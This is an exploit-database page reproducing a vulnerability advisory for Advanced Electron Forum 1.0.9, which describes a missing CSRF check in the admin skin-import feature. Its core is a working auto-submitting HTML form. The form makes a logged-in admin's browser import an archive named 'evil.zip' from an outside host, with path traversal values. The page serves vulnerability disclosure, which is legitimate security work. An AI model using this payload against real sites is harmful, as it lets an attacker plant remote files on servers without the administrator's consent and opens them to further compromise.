[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery

Author
hyp3rlinx
Risk
[
Security Risk High
]
0day-ID
0day-ID-24866
Category
web applications
Date add
18-01-2016
Platform
php
[+] Credits: hyp3rlinx
 
 
Vendor:
=============================
www.anelectron.com/downloads/
 
 
 
Product:
================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
 
 
Vulnerability Type:
============================
Remote File Inclusion / CSRF
 
 
 
CVE Reference:
==============
N/A
 
 
 
Vulnerability Details:
=====================
 
In Admin control panel there is option to Import Skins and one choice is
using a web URL.
 
From AEF:
 
"Specify the URL of the theme on the net. The theme file must be a
compressed archive (zip, tgz, tbz2, tar)."
 
However there is no CSRF token or check made that this is a valid request
made by the currently logged in user, resulting
in arbitrary remote file imports from an attacker if the user visits or
clicks an malicious link. Victims will then be left
open to arbitrary malicious file downloads from anywhere on the net which
may be used as a platform for further attacks...
 
 
 
Exploit code(s):
===============
 
<form id="EL-DOWNLOADO" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=skin&seadact=import"
method="post">
<input type="hidden" name="folderpath" value="../" />
<input type="hidden" name="importtype" value="2" />
<input type="hidden" name="weburl" value="
http://hyp3rlinx.altervista.org/evil.zip" />
<input type="hidden" name="filepath" value="../" />
<input type="hidden" name="uploadtheme" value="" />
<input type="hidden" name="importskin" value="Import" />
<script>document.getElementById('EL-DOWNLOADO').submit()</script>
</form>
 
 
 
Disclosure Timeline:
======================================
Vendor Notification:  NA
January 17, 2016  : Public Disclosure
 
 
 
Exploitation Technique:
=======================
Remote
 
 
 
Severity Level:
===============
High
 
 
 
Description:
==================================================================
 
 
Request Method(s):         [+] POST
 
 
Vulnerable Product:        [+] Advanced Electron Forum v1.0.9 (AEF)

#  0day.today [2024-12-25]  #